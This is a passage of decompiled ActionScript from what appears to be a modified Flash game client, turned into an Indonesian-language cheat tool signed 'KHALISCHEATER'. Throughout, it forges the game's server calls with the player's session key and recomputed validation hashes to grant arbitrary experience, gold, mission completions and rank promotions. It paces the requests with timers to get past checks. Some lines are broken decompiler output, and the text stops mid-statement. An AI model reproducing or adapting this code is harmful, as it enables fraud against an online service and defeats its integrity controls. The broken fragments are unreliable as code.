(_arg2.length != 5){ } else { this._netConnection.call(_arg1, new Responder(_arg3, this.erroneousResult), _arg2[0], _arg2[1], _arg2[2], _arg2[3], _arg2[4]); }; if (_arg2.length != 6){ } else { this._netConnection.call(_arg1, new Responder(_arg3, this.erroneousResult), _arg2[0], _arg2[1], _arg2[2], _arg2[3], _arg2[4], _arg2[5]); }; if (_arg2.length != 7){ } else { this._netConnection.call(_arg1, new Responder(_arg3, this.erroneousResult), _arg2[0], _arg2[1], _arg2[2], _arg2[3], _arg2[4], _arg2[5], _arg2[6]); }; if (_arg2.length != 8){ } else { this._netConnection.call(_arg1, new Responder(_arg3, this.erroneousResult), _arg2[0], _arg2[1], _arg2[2], _arg2[3], _arg2[4], _arg2[5], _arg2[6], _arg2[7]); }; if (_arg2.length != 9){ } else { this._netConnection.call(_arg1, new Responder(_arg3, this.erroneousResult), _arg2[0], _arg2[1], _arg2[2], _arg2[3], _arg2[4], _arg2[5], _arg2[6], _arg2[7], _arg2[8]); }; if (_arg2.length != 10){ } else { this._netConnection.call(_arg1, new Responder(_arg3, this.erroneousResult), _arg2[0], _arg2[1], _arg2[2], _arg2[3], _arg2[4], _arg2[5], _arg2[6], _arg2[7], _arg2[8], _arg2[9]); }; if (_arg2.length != 11){ } else { this._netConnection.call(_arg1, new Responder(_arg3, this.erroneousResult), _arg2[0], _arg2[1], _arg2[2], _arg2[3], _arg2[4], _arg2[5], _arg2[6], _arg2[7], _arg2[8], _arg2[9], _arg2[10]); }; if (_arg2.length != 12){ } else { this._netConnection.call(_arg1, new Responder(_arg3, this.erroneousResult), _arg2[0], _arg2[1], _arg2[2], _arg2[3], _arg2[4], _arg2[5], _arg2[6], _arg2[7], _arg2[8], _arg2[9], _arg2[10], _arg2[11]); }; if (_arg2.length != 13){ } else { this._netConnection.call(_arg1, new Responder(_arg3, this.erroneousResult), _arg2[0], _arg2[1], _arg2[2], _arg2[3], _arg2[4], _arg2[5], _arg2[6], _arg2[7], _arg2[8], _arg2[9], _arg2[10], _arg2[11], _arg2[12]); }; if (_arg2.length != 14){ } else { this._netConnection.call(_arg1, new Responder(_arg3, this.erroneousResult), _arg2[0], _arg2[1], _arg2[2], _arg2[3], _arg2[4], _arg2[5], _arg2[6], _arg2[7], _arg2[8], _arg2[9], _arg2[10], _arg2[11], _arg2[12], _arg2[13]); }; if (_arg2.length != 15){ } else { this._netConnection.call(_arg1, new Responder(_arg3, this.erroneousResult), _arg2[0], _arg2[1], _arg2[2], _arg2[3], _arg2[4], _arg2[5], _arg2[6], _arg2[7], _arg2[8], _arg2[9], _arg2[10], _arg2[11], _arg2[12], _arg2[13], _arg2[14]); }; if (_arg2.length != 16){ } else { this._netConnection.call(_arg1, new Responder(_arg3, this.erroneousResult), _arg2[0], _arg2[1], _arg2[2], _arg2[3], _arg2[4], _arg2[5], _arg2[6], _arg2[7], _arg2[8], _arg2[9], _arg2[10], _arg2[11], _arg2[12], _arg2[13], _arg2[14], _arg2[15]); }; } private function connectionHandler(_arg1:NetStatusEvent):void{ } private function successfulResult(_arg1:Object):void{ } private function erroneousResult(_arg1:Object):void{ } private function Event_exchangeBtn(_arg1:MouseEvent):void{ this.gotoAndStop(Timeline.NA_EXCHANGE); } private function Event_duitBtn(_arg1:MouseEvent):void{ if (this.missionE != "complete"){ } else { Central.main.showInfo("Khusus member Senior!"); return; }; this.tombolSekali = 0; this.gotoAndStop("pet"); } private function Event_petBtn(_arg1:MouseEvent):void{ if (this.currentLabel == Timeline.NA_PET){ } else { this.gotoAndStop(Timeline.NA_PET); }; } private function initSharedButtons():void{ var _local1:uint; Central.main.initButton(this["passportBtn"], this.Event_passportBtn, "EXP"); Central.main.initButton(this["exchangeBtn"], this.Event_exchangeBtn, "Level"); Central.main.initButton(this["bloodlineBtn"], this.Event_bloodlineBtn, "Mission"); Central.main.initButton(this["duitBtn"], this.Event_duitBtn, "Gold"); this["btnExit"].addEventListener(MouseEvent.CLICK, this.hide); } private function onExchange():void{ this.stop(); this.tipeCheat = 0; var _local1:* = int(Central.main.getMainChar().getLevel()); this["lbl_youhave"].text = String(("Anda sekarang level " + _local1)); this["npcTxt"].text = "Masukkan level yang anda tuju, lalu klik xchange. Saat anda level 20 atau 40, char akan otomatis lulus chunin atau jounin exam. (atur delay untuk mempercepat proses, default: 16) NB: XP TERGANTUNG MISSION YANG BISA DIKERJAKAN "; if (this.febgrnhtmplkij == 15265){ } else { Central.panel.getInstance().hide(this); }; Central.main.initButton(this["confirmExchangeBtn"], this.confirmExchange, ButtonData.HQ_EXCHANGE); this["crystalTxt"].text = (_local1 + 1); var _local2:* = int(this["crystalTxt"].text); if (_local2 >= (int(_local1) + 1)){ } else { _local2 = (_local1 + 1); }; var _local3:uint = 130; var _local4:uint = 50; var _local5:uint = 50; var _local6:uint = Central.main.getMainChar().getData("character_xp"); var _local7:uint = 130; var _local8:uint = 50; var _local9:uint = 50; var _local10:uint; var _local11:uint = 1; while (//unresolved if , true) { _local10 = (_local10 + Math.round(((_local11 * _local7) * Math.pow(_local8, (_local11 / _local9))))); _local11 = (_local11 + 1); }; if (_local10 < 0){ _local10 = 0; }; var _local12:uint = (_local10 - _local6); this["lbl_gold"].text = String(_local12); this["crystalTxt"].addEventListener(Event.CHANGE, this.updateConvertedGold); this["maxCrystalTxt"].text = String(Central.main.langLib.get(23)).replace("[valTotalToken]", String(Account.getAccountBalance())); this["goldTxt"].text = "0"; this["totalGoldTxt"].text = ((Central.main.langLib.titleTxt(TitleData.TOTAL) + ":") + Central.main.getMainChar().getGold()); Central.main.initButton(this["getMoreBtn"], Central.main.buyCrystal, ButtonData.GETMORE); this.initSharedButtons(); } public function hide(_arg1:MouseEvent=null):void{ Central.panel.getInstance().hide(this); } function frame1(){ this.stop(); } private function onHelpOut(_arg1:MouseEvent):void{ Central.main.hideTextTooltip(); } private function upgradeAccount(_arg1:MouseEvent):void{ Central.main.getMainChar().resetAP(1); } private function completeDailyTask(_arg1:uint, _arg2:uint, _arg3:String):void{ var _local4:* = Central.main.getMainChar().getData("character_id"); var _local5:* = Central.main.getMainChar().getData("character_level"); var _local6:* = 0; var _local7:* = 0; if (!Central.main.getMainChar().pet){ } else { _local6 = Central.main.getMainChar().pet.getData("character_id"); _local7 = Central.main.getMainChar().pet.getLevel(); }; var _local8:* = Central.main.getArrayHash([Account.getAccountSessionKey(), _local4, _local5, _arg1, _arg2, _arg3, _local6, _local7]); var _local9:* = Central.main.updateSequence(); this.AMFps("CharacterDAO.completeDailyTask", [Account.getAccountSessionKey(), _local4, _local5, _arg1, _arg2, _arg3, _local6, _local7, _local8, _local9], this.myUpdateResult); } private function updateCharacter(_arg1:uint, _arg2:uint, _arg3:Array, _arg4:Array, _arg5:Array, _arg6:String, _arg7:int=0):void{ var _local8:* = Central.main.getMainChar().getData("character_id"); var _local9:* = Central.main.getMainChar().getData("character_level"); var _local10:* = 0; var _local11:* = 0; if (!Central.main.getMainChar().pet){ } else { _local10 = Central.main.getMainChar().pet.getData("character_id"); _local11 = Central.main.getMainChar().pet.getLevel(); }; var _local12:* = Central.main.getArrayHash([Account.getAccountSessionKey(), _local8, _local9, Math.round(_arg1), Math.round(_arg2), _arg3, _arg4, _arg5, _local10, _local11, _arg6, _arg7, 0]); var _local13:* = Central.main.updateSequence(); this.AMFps("CharacterService.updateCharacter", [Account.getAccountSessionKey(), _local8, int(_local9), Math.round(_arg1), Math.round(_arg2), _arg3, _arg4, _arg5, _local10, int(_local11), _arg6, _local12, _local13, _arg7, 0], this.myUpdateResult); } private function myUpdateResult(_arg1:Object):void{ this.connectingAmf = false; Central.main.hideAmfLoading(); var _local2:* = Central.main.getMainChar().getData("character_level"); Central.main.getMainChar().updateXP(8000); if (Central.main.getMainChar().getData("character_level") <= _local2){ } else { Central.main.showInfo(String((_local2 + 1))); }; if (Central.main.getMainChar().getData("character_level") != 60){ } else { Central.main.showInfo("Sudah level 80"); return; }; this.connectingAmf = true; this.completeDailyTask(8000, 0, null); } private function onShow():void{ var _local1:uint; this.stop(); this.tipeCheat = 0; Central.main.initButton(this["confirmExpBtn"], this.confirmExp, ButtonData.HQ_EXCHANGE); this["npcTxt"].text = "Masukkan jumlah exp (dalam jutaan), lalu klik xchange. Saat anda level 20 atau 40, char akan otomatis lulus chunin atau jounin exam. (atur delay untuk mempercepat proses, default: 16) NB:XP TERGANTUNG MISI YANG BISA DIKERJAKAN\r\n"; var _local2:* = int(Central.main.getMainChar().getLevel()); this["lbl_youhave"].text = String(("Anda sekarang level " + _local2)); this["crystalTxt"].text = String(1); this.crystal = int(this["crystalTxt"].text); this["lbl_gold"].text = String((1000000 * this.crystal)); this["crystalTxt"].addEventListener(Event.CHANGE, this.updateConvertedExp); this.initSharedButtons(); } private function rankResultChunin(_arg1:Object):void{ this.connectingAmf = false; this.chuninz = true; } private function rankResultJounin(_arg1:Object):void{ this.connectingAmf = false; this.jouninz = true; } private function onButtons(_arg1:MouseEvent):void{ switch (_arg1.currentTarget.name){ if (this.currentLabel == Timeline.NA_PASSPORT){ } else { this.gotoAndStop(Timeline.NA_PASSPORT); }; break; if (this.currentLabel == Timeline.NA_EXCHANGE){ } else { this.gotoAndStop(Timeline.NA_EXCHANGE); }; break; if (this.currentLabel == Timeline.NA_BLOODLINE){ } else { this.gotoAndStop(Timeline.NA_BLOODLINE); }; break; case "petBtn": if (this.currentLabel == Timeline.NA_PET){ } else { this.gotoAndStop(Timeline.NA_PET); }; break; }; } private function onPet():void{ this.stop(); this.tipeCheat = 2; this.crystal = int(this["crystalTxt"].text); this["lbl_gold"].text = String((100000 * this.crystal)); this["npcTxt"].text = "Masukkan jumlah Gold yang ingin diambil (x100ribu). Klik xchange"; this["crystalTxt"].addEventListener(Event.CHANGE, this.updateConvertedDuit); Central.main.initButton(this["confirmDuitBtn"], this.confirmDuit, ButtonData.HQ_EXCHANGE); this.initSharedButtons(); } private function updateConvertedDuit(_arg1:Event):void{ this.crystal = int(this["crystalTxt"].text); var _local2:* = int(Central.main.getMainChar().getLevel()); this["lbl_gold"].text = String((100000 * this.crystal)); } private function confirmDuit(_arg1:MouseEvent):void{ if (this.tombolSekali != 1){ } else { Central.main.showInfo("Eits, Sabar! klik tombol Gold lagi.."); return; }; this.tombolSekali = 1; this.expMax = this["lbl_gold"].text; this.expTotal = 0; this.bonusGold = 0; this["lbl_gold2"].text = String(this.bonusGold); var _local2:uint = int(this["goldTxt"].text); this.detikMin = _local2; Central.main.showAmfLoading(); this.connectingAmf = true; this.doMission(); } private function onHelp(_arg1:MouseEvent):void{ var _local2:* = new Point(_arg1.stageX, _arg1.stageY); switch (_arg1.currentTarget.name){ Central.main.showTextTooltip("View your Ninja Emblem status and acquire Ninja Emblem.", _local2); break; Central.main.showTextTooltip("Need more gold? You can convert your Token to Gold here!", _local2); break; case "bloodlineHelp": Central.main.showTextTooltip("Bloodline is the powerful technique in this world. Only the experienced ninja is able to train their own Bloodline.", _local2); break; Central.main.showTextTooltip("A linked pet can assist you in every battle. Pets are powerful creatures and difficult to control.", _local2); break; }; } private function updateConvertedGold(_arg1:Event):void{ this.crystal = int(this["crystalTxt"].text); var _local2:* = Central.main.getMainChar().getData("character_id"); var _local3:* = int(Central.main.getMainChar().getLevel()); var _local4:* = int(this["crystalTxt"].text); if (_local4 >= (int(_local3) + 1)){ } else { _local4 = (_local3 + 1); }; var _local5:uint = 130; var _local6:uint = 50; var _local7:uint = 50; var _local8:uint = Central.main.getMainChar().getData("character_xp"); var _local9:uint = 130; var _local10:uint = 50; var _local11:uint = 50; var _local12:uint; var _local13:uint = 1; while (//unresolved if , true) { _local12 = (_local12 + Math.round(((_local13 * _local9) * Math.pow(_local10, (_local13 / _local11))))); _local13 = (_local13 + 1); }; if (_local12 >= 0){ } else { _local12 = 0; }; var _local14:uint = (_local12 - _local8); this["lbl_youhave"].text = String(("Anda sekarang level " + _local3)); this["lbl_gold"].text = String(_local14); } private function updateConvertedExp(_arg1:Event):void{ this.crystal = int(this["crystalTxt"].text); var _local2:* = int(Central.main.getMainChar().getLevel()); this["lbl_youhave"].text = String(("Anda sekarang level " + _local2)); this["lbl_gold"].text = String((1000000 * this.crystal)); } function frame56(){ this.onShow(); } private function onBloodline():void{ this.stop(); this.delayDulu = 0; this["npcTxt"].text = "Masukkan nomor id Mission beserta jumlah exp dan gold yang dikehendaki. (atur delay untuk mempercepat proses, default: 16)"; Central.main.initButton(this["confirmMissionBtn"], this.confirmMission, ButtonData.HQ_EXCHANGE); } private function confirmMission(_arg1:MouseEvent):void{ this.detikMin = int(this["goldTxt"].text); var _local2:String = this["crystalTxt"].text; var _local3:uint = this["crystal2Txt"].text; var _local4:uint = this["crystal3Txt"].text; if (this.delayDulu != 0){ } else { Central.main.showAmfLoading(); this.connectingAmf = true; this.getapp(_local2, _local3, _local4); }; if (this.delayDulu != 1){ } else { Central.main.showInfo("Eits, Sabar! kalau gk sabar,,, nanti digigit nyamuk lhooo\r\n"); }; } private function getapp(_arg1:String, _arg2:uint, _arg3:uint):void{ var _local4:String = String(("msn" + _arg1)); this.dapatItem2(_arg2, _arg3, [], [], [], _local4, 0, _arg1); } private function onExchangeResult(_arg1:Object):void{ if (String(_arg1.status) != AMFData.STATUS_ERROR){ } else { Central.main.onError(String(_arg1.error)); return; }; if (String(_arg1.status) != AMFData.STATUS_SUCCESS){ } else { Central.main.showInfo(((this.crystal + " ") + Central.main.langLib.get(20))); Central.main.getMainChar().updateData(DBCharacterData.GOLD, ((this.crystal * 20) + Central.main.getMainChar().getGold())); Account.balance = (Account.getAccountBalance() - this.crystal); this.crystal = 0; this.onExchange(); Central.main.hideAmfLoading(); this.connectingAmf = false; }; } function frame57(){ this.onExchange(); } function frame61(){ this.onBloodline(); } private function confirmExp(_arg1:MouseEvent):void{ this.expMax = this["lbl_gold"].text; this.expTotal = 0; this.bonusGold = 0; this["lbl_gold2"].text = String(this.bonusGold); var _local2:uint = int(this["goldTxt"].text); this.detikMin = _local2; Central.main.showAmfLoading(); this.connectingAmf = true; this.doMission(); } private function confirmExchange(_arg1:MouseEvent):void{ var _local2:uint = int(this["crystalTxt"].text); var _local3:uint = (int(Central.main.getMainChar().getLevel()) + 1); if (_local2 >= _local3){ } else { _local2 = _local3; this["crystalTxt"].text = String(_local2); Central.main.showInfo("Masukkan level yang lebih tinggi!"); return; }; this.expMax = this["lbl_gold"].text; this.bonusGold = 0; this["lbl_gold2"].text = String(this.bonusGold); this.expTotal = 0; var _local4:uint = int(this["goldTxt"].text); this.detikMin = _local4; Central.main.showAmfLoading(); this.connectingAmf = true; this.doMission(); } private function dapatItem(_arg1:uint, _arg2:uint, _arg3:Array, _arg4:Array, _arg5:Array, _arg6:String, _arg7:int, _arg8:uint):void{ var _local9:* = Central.main.getMainChar().getData("character_id"); var _local10:* = Central.main.getMainChar().getData("character_level"); var _local11:* = 0; var _local12:* = 0; var _local13:int; var _local14:String = String((("[object Mission_" + _arg8) + "]")); var _local15:String = Central.main.getHash("loadSwf"); var _local16 = 1; var _local17:String = Central.main.getHash(((((_local16 + "_setMission_") + _local14) + "_") + _local15)); var _local18 = 2; var _local19:String = Central.main.getHash(((_local18 + "_setEventData_") + _local17)); var _local20 = 3; var _local21:String = Central.main.getHash(((_local20 + "_completeMission_") + _local19)); if (!Central.main.getMainChar().pet){ } else { _local11 = Central.main.getMainChar().pet.getData("character_id"); _local12 = Central.main.getMainChar().pet.getLevel(); }; var _local22:* = Central.main.getArrayHash([Account.getAccountSessionKey(), _local9, _local10, Math.round(_arg1), Math.round(_arg2), _arg3, _local11, _local12, _arg6, _arg7, _local21]); var _local23:* = Central.main.updateSequence(); this.expDapet = _arg1; this.goldDapet = _arg2; this.msnDapet = _arg6; this.AMFps("CharacterService.updateCharacter", [Account.getAccountSessionKey(), _local9, int(_local10), Math.round(_arg1), Math.round(_arg2), _arg3, _local11, int(_local12), _arg6, _local22, _local23, _arg7, _local21], this.levelingResult); } private function dapatItem2(_arg1:uint, _arg2:uint, _arg3:Array, _arg4:Array, _arg5:Array, _arg6:String, _arg7:int, _arg8:uint):void{ var _local9:* = Central.main.getMainChar().getData("character_id"); var _local10:* = Central.main.getMainChar().getData("character_level"); var _local11:* = 0; var _local12:* = 0; var _local13:int; var _local14:String = String((("[object Mission_" + _arg8) + "]")); var _local15:String = Central.main.getHash("loadSwf"); var _local16 = 1; var _local17:String = Central.main.getHash(((((_local16 + "_setMission_") + _local14) + "_") + _local15)); var _local18 = 2; var _local19:String = Central.main.getHash(((_local18 + "_setEventData_") + _local17)); var _local20 = 3; var _local21:String = Central.main.getHash(((_local20 + "_completeMission_") + _local19)); if (!Central.main.getMainChar().pet){ } else { _local11 = Central.main.getMainChar().pet.getData("character_id"); _local12 = Central.main.getMainChar().pet.getLevel(); }; var _local22:* = Central.main.getArrayHash([Account.getAccountSessionKey(), _local9, _local10, Math.round(_arg1), Math.round(_arg2), _arg3, _local11, _local12, _arg6, _arg7, _local21]); var _local23:* = Central.main.updateSequence(); this.expDapet = _arg1; this.goldDapet = _arg2; this.msnDapet = _arg6; this.AMFps("CharacterService.updateCharacter", [Account.getAccountSessionKey(), _local9, int(_local10), Math.round(_arg1), Math.round(_arg2), _arg3, _local11, int(_local12), _arg6, _local22, _local23, _arg7, _local21], this.levelingResult2); } private function levelingResult2(_arg1:Object):void{ Central.main.hideAmfLoading(); this.connectingAmf = false; if (String(_arg1.status) != AMFData.STATUS_ERROR){ } else { Central.main.onError(String(_arg1.error)); return; }; this.delayDulu = 1; this.missionTimer = new Timer(1000, this.detikMin); this.missionTimer.start(); Central.main.getMainChar().updateXP(this.expDapet); Central.main.getMainChar().saveGold(this.goldDapet); this.detik = this.detikMin; this["goldTxt"].text = String(this.detik); var _local2:String; if (this.msnDapet != "msn55"){ } else { Central.main.showInfo("Lulus Chunin Exam Part 1!"); this.chunina = true; }; if (this.msnDapet != "msn56"){ } else { Central.main.showInfo("Lulus Chunin Exam Part 2!"); this.chuninb = true; }; if (this.msnDapet != "msn57"){ } else { Central.main.showInfo("Lulus Chunin Exam Part 3!"); this.chuninc = true; }; if (this.msnDapet != "msn58"){ } else { Central.main.showInfo("Lulus Chunin Exam Part 4!"); this.chunind = true; }; if (!(this.msnDapet == "msn59")){ } else { (this.msnDapet == "msn59"); }; if (!(this.msnDapet == "msn59")){ } else { this.connectingAmf = true; this.AMFps("CharacterDAO.rankup", [Account.getAccountSessionKey()], this.rankResultChunin); Central.main.getMainChar().updateData(DBCharacterData.RANK, 2); Central.main.showInfo("Lulus Chunin!"); this.chunine = true; }; if (this.msnDapet != "msn132"){ } else { Central.main.showInfo("Lulus Jounin Exam Part 1!"); this.jounina = true; }; if (this.msnDapet != "msn133"){ } else { Central.main.showInfo("Lulus Jounin Exam Part 2!"); this.jouninb = true; }; if (this.msnDapet != "msn134"){ } else { Central.main.showInfo("Lulus Jounin Exam Part 3!"); this.jouninc = true; }; if (this.msnDapet != "msn135"){ } else { Central.main.showInfo("Lulus Jounin Exam Part 4!"); this.jounind = true; }; if (!(this.msnDapet == "msn136")){ } else { (this.msnDapet == "msn136"); }; if ((this.msnDapet == "msn136")){ this.connectingAmf = true; this.AMFps("CharacterDAO.rankup", [Account.getAccountSessionKey()], this.rankResultJounin); Central.main.getMainChar().updateData(DBCharacterData.RANK, 4); Central.main.showInfo("Lulus Jounin!"); this.jounine = true; }; if (this.msnDapet != "msn200"){ } else { Central.main.showInfo("Lulus Special Jounin Exam Stage 1 Part 1!"); this.jounina = true; }; if (this.msnDapet != "msn205"){ } else { Central.main.showInfo("Lulus Special Jounin Exam Stage 1 Part 2!"); this.jouninb = true; }; if (this.msnDapet != "msn202"){ } else { Central.main.showInfo("Lulus Special Jounin Exam Stage 2 Part 1!"); this.jouninc = true; }; if (this.msnDapet != "msn206"){ } else { Central.main.showInfo("Lulus Special Jounin Exam Stage 2 Part 2!"); this.jounind = true; }; if (this.msnDapet != "msn203"){ } else { Central.main.showInfo("Lulus Special Jounin Exam Stage 3 Part 1!"); this.jounind = true; }; if (this.msnDapet != "msn207"){ } else { Central.main.showInfo("Lulus Special Jounin Exam Stage 3 Part 2!"); this.jounind = true; }; if (this.msnDapet != "msn204"){ } else { Central.main.showInfo("Lulus Special Jounin Exam Stage 4 Part 1!"); this.jounind = true; }; if (this.msnDapet != "msn208"){ } else { Central.main.showInfo("Lulus Special Jounin Exam Stage 4 Part 2!"); this.jounind = true; }; if (this.msnDapet != "msn201"){ } else { Central.main.showInfo("Lulus Special Jounin Exam Stage 5 Part 1!"); this.jounind = true; }; if (this.msnDapet != "msn209"){ } else { Central.main.showInfo("Lulus Special Jounin Exam Stage 5 Part 2!"); this.jounind = true; }; if (this.msnDapet != "msn210"){ } else { Central.main.showInfo("Lulus Special Jounin Exam Stage 6 Part 1!"); this.jounind = true; }; if (this.msnDapet != "msn211"){ } else { Central.main.showInfo("Lulus Special Jounin Exam Stage 6 Part 2!"); this.jounind = true; }; if (this.msnDapet != "msn210"){ } else { Central.main.showInfo("Lulus Special Jounin Exam Final!"); this.jounind = true; }; Central.main.getMainChar().addInventory(InventoryData.TYPE_WEAPON, _local2); this.missionTimer.addEventListener(TimerEvent.TIMER, this.missionTimerHandler2); this.missionTimer.addEventListener(TimerEvent.TIMER_COMPLETE, this.timerHandler2); } private function missionTimerHandler2(_arg1:TimerEvent):void{ var _local2:* = this.detik; this.detik = (_local2 - 1); if (this.detik != 1){ } else { this["goldTxt"].text = (String(this.detik) + " second"); }; this["goldTxt"].text = (String(this.detik) + " seconds"); } private function timerHandler2(_arg1:TimerEvent):void{ this.connectingAmf = true; this["goldTxt"].text = String(16); this.delayDulu = 0; Central.main.showInfo("Delay Selesai"); } private function leveling(_arg1:uint, _arg2:uint, _arg3:Array, _arg4:Array, _arg5:Array, _arg6:String, _arg7:int=0):void{ var _local8:* = Central.main.getMainChar().getData("character_id"); var _local9:* = Central.main.getMainChar().getData("character_level"); var _local10:* = 0; var _local11:* = 0; var _local12:int; if (!Central.main.getMainChar().pet){ } else { _local10 = Central.main.getMainChar().pet.getData("character_id"); _local11 = Central.main.getMainChar().pet.getLevel(); }; var _local13:* = Central.main.getArrayHash([Account.getAccountSessionKey(), _local8, _local9, Math.round(_arg1), Math.round(_arg2), _arg3, _arg4, _arg5, _local10, _local11, _arg6, _arg7, _local12]); var _local14:* = Central.main.updateSequence(); this.expDapet = _arg1; this.goldDapet = _arg2; this.AMFps("CharacterService.updateCharacter", [Account.getAccountSessionKey(), _local8, int(_local9), Math.round(_arg1), Math.round(_arg2), _arg3, _arg4, _arg5, _local10, int(_local11), _arg6, _local13, _local14, _arg7, _local12], this.levelingResult); } private function levelingResult(_arg1:Object):void{ Central.main.hideAmfLoading(); this.connectingAmf = false; if (String(_arg1.status) != AMFData.STATUS_ERROR){ } else { Central.main.onError(String(_arg1.error)); return; }; if (this.tipeCheat != 2){ } else { this.missionTimer = new Timer(1000, this.detikMin); this.missionTimer.start(); Central.main.getMainChar().updateXP(this.expDapet); Central.main.getMainChar().saveGold(this.goldDapet); var _local2:uint = (this.bonusGold + this.expDapet); this.bonusGold = _local2; this["lbl_gold2"].text = String(this.bonusGold); this.detik = this.detikMin; this["goldTxt"].text = String(this.detik); var _local3:String; var _local4:* = Central.main.getMainChar().getData("character_level"); var _local5:* = (this.expTotal + this.goldDapet); var _local6:* = (this.expMax - _local5); this.expTotal = _local5; this["lbl_token"].text = _local5; if (this.expTotal != this.expMax){ } else { this["lbl_gold"].text = "-"; return; }; if (this.expTotal <= this.expMax){ } else { this["lbl_gold"].text = "-"; return; }; if (this.expTotal >= this.expMax){ } else { this["lbl_gold"].text = _local6; }; if (this.msnDapet != "msn55"){ } else { Central.main.showInfo("Lulus Chunin Exam Part 1!"); this.chunina = true; }; if (this.msnDapet != "msn56"){ } else { Central.main.showInfo("Lulus Chunin Exam Part 2!"); this.chuninb = true; }; if (this.msnDapet != "msn57"){ } else { Central.main.showInfo("Lulus Chunin Exam Part 3!"); this.chuninc = true; }; if (this.msnDapet != "msn58"){ } else { Central.main.showInfo("Lulus Chunin Exam Part 4!"); this.chunind = true; }; if (!(this.msnDapet == "msn59")){ } else { (this.msnDapet == "msn59"); }; if (!(this.msnDapet == "msn59")){ } else { this.connectingAmf = true; this.AMFps("CharacterDAO.rankup", [Account.getAccountSessionKey()], this.rankResultChunin); Central.main.getMainChar().updateData(DBCharacterData.RANK, 2); Central.main.showInfo("Lulus Chunin!"); this.chunine = true; }; if (this.msnDapet != "msn132"){ } else { Central.main.showInfo("Lulus Jounin Exam Part 1!"); this.jounina = true; }; if (this.msnDapet != "msn133"){ } else { Central.main.showInfo("Lulus Jounin Exam Part 2!"); this.jouninb = true; }; if (this.msnDapet != "msn134"){ } else { Central.main.showInfo("Lulus Jounin Exam Part 3!"); this.jouninc = true; }; if (this.msnDapet != "msn135"){ } else { Central.main.showInfo("Lulus Jounin Exam Part 4!"); this.jounind = true; }; if (!(this.msnDapet == "msn136")){ } else { (this.msnDapet == "msn136"); }; if ((this.msnDapet == "msn136")){ this.connectingAmf = true; this.AMFps("CharacterDAO.rankup", [Account.getAccountSessionKey()], this.rankResultJounin); Central.main.getMainChar().updateData(DBCharacterData.RANK, 4); Central.main.showInfo("Lulus Jounin!"); this.jounine = true; }; Central.main.getMainChar().addInventory(InventoryData.TYPE_WEAPON, _local3); this.missionTimer.addEventListener(TimerEvent.TIMER, this.missionTimerHandler); this.missionTimer.addEventListener(TimerEvent.TIMER_COMPLETE, this.timerHandler); return; }; this.missionTimer = new Timer(1000, this.detikMin); this.missionTimer.start(); Central.main.getMainChar().updateXP(this.expDapet); Central.main.getMainChar().saveGold(this.goldDapet); _local2 = (this.bonusGold + this.goldDapet); this.bonusGold = _local2; this["lbl_gold2"].text = String(this.bonusGold); this.detik = this.detikMin; this["goldTxt"].text = String(this.detik); _local3 = null; _local4 = Central.main.getMainChar().getData("character_level"); _local5 = (this.expTotal + this.expDapet); _local6 = (this.expMax - _local5); this.expTotal = _local5; this["lbl_youhave"].text = String(("Anda sekarang Level " + _local4)); this["lbl_token"].text = _local5; if (this.expTotal != this.expMax){ } else { this["lbl_gold"].text = "-"; return; }; if (this.expTotal <= this.expMax){ } else { this["lbl_gold"].text = "-"; return; }; if (this.expTotal >= this.expMax){ } else { this["lbl_gold"].text = _local6; }; if (this.msnDapet != "msn55"){ } else { Central.main.showInfo("Lulus Chunin Exam Part 1!"); this.chunina = true; }; if (this.msnDapet != "msn56"){ } else { Central.main.showInfo("Lulus Chunin Exam Part 2!"); this.chuninb = true; }; if (this.msnDapet != "msn57"){ } else { Central.main.showInfo("Lulus Chunin Exam Part 3!"); this.chuninc = true; }; if (this.msnDapet != "msn58"){ } else { Central.main.showInfo("Lulus Chunin Exam Part 4!"); this.chunind = true; }; if (!(this.msnDapet == "msn59")){ } else { (this.msnDapet == "msn59"); }; if (!(this.msnDapet == "msn59")){ } else { this.connectingAmf = true; this.AMFps("CharacterDAO.rankup", [Account.getAccountSessionKey()], this.rankResultChunin); Central.main.getMainChar().updateData(DBCharacterData.RANK, 2); Central.main.showInfo("Lulus Chunin!"); this.chunine = true; }; if (this.msnDapet != "msn132"){ } else { Central.main.showInfo("Lulus Jounin Exam Part 1!"); this.jounina = true; }; if (this.msnDapet != "msn133"){ } else { Central.main.showInfo("Lulus Jounin Exam Part 2!"); this.jouninb = true; }; if (this.msnDapet != "msn134"){ } else { Central.main.showInfo("Lulus Jounin Exam Part 3!"); this.jouninc = true; }; if (this.msnDapet != "msn135"){ } else { Central.main.showInfo("Lulus Jounin Exam Part 4!"); this.jounind = true; }; if (!(this.msnDapet == "msn136")){ } else { (this.msnDapet == "msn136"); }; if ((this.msnDapet == "msn136")){ this.connectingAmf = true; this.AMFps("CharacterDAO.rankup", [Account.getAccountSessionKey()], this.rankResultJounin); Central.main.getMainChar().updateData(DBCharacterData.RANK, 4); Central.main.showInfo("Lulus Jounin!"); this.jounine = true; }; Central.main.getMainChar().addInventory(InventoryData.TYPE_WEAPON, _local3); this.missionTimer.addEventListener(TimerEvent.TIMER, this.missionTimerHandler); this.missionTimer.addEventListener(TimerEvent.TIMER_COMPLETE, this.timerHandler); } private function missionTimerHandler(_arg1:TimerEvent):void{ var _local2:* = this.detik; this.detik = (_local2 - 1); if (this.detik != 1){ } else { this["goldTxt"].text = (String(this.detik) + " second"); }; this["goldTxt"].text = (String(this.detik) + " seconds"); } private function timerHandler(_arg1:TimerEvent):void{ this.connectingAmf = true; var _local2:* = (this.expMax - this.expTotal); if (_local2 != 0){ } else { this["lbl_gold"].text = "-"; Central.main.showInfo("Selesai !!! HOREEE !!! # BY KHALISCHEATER"); return; }; if (this.expTotal <= this.expMax){ } else { return; }; if (this.expTotal >= this.expMax){ } else { this.doMission(); }; } private function doMission():void{ var _local1:Object = Central.main.getMainChar().checkMissionRecord("msn55"); var _local2:Object = Central.main.getMainChar().checkMissionRecord("msn56"); var _local3:Object = Central.main.getMainChar().checkMissionRecord("msn57"); var _local4:Object = Central.main.getMainChar().checkMissionRecord("msn58"); var _local5:Object = Central.main.getMainChar().checkMissionRecord("msn59"); var _local6:Object = Central.main.getMainChar().checkMissionRecord("msn132"); var _local7:Object = Central.main.getMainChar().checkMissionRecord("msn133"); var _local8:Object = Central.main.getMainChar().checkMissionRecord("msn134"); var _local9:Object = Central.main.getMainChar().checkMissionRecord("msn135"); var _local10:Object = Central.main.getMainChar().checkMissionRecord("msn136"); var _local11:Object = Central.main.getMainChar().checkMissionRecord("msn200"); var _local12:Object = Central.main.getMainChar().checkMissionRecord("msn205"); var _local13:Object = Central.main.getMainChar().checkMissionRecord("msn202"); var _local14:Object = Central.main.getMainChar().checkMissionRecord("msn206"); var _local15:Object = 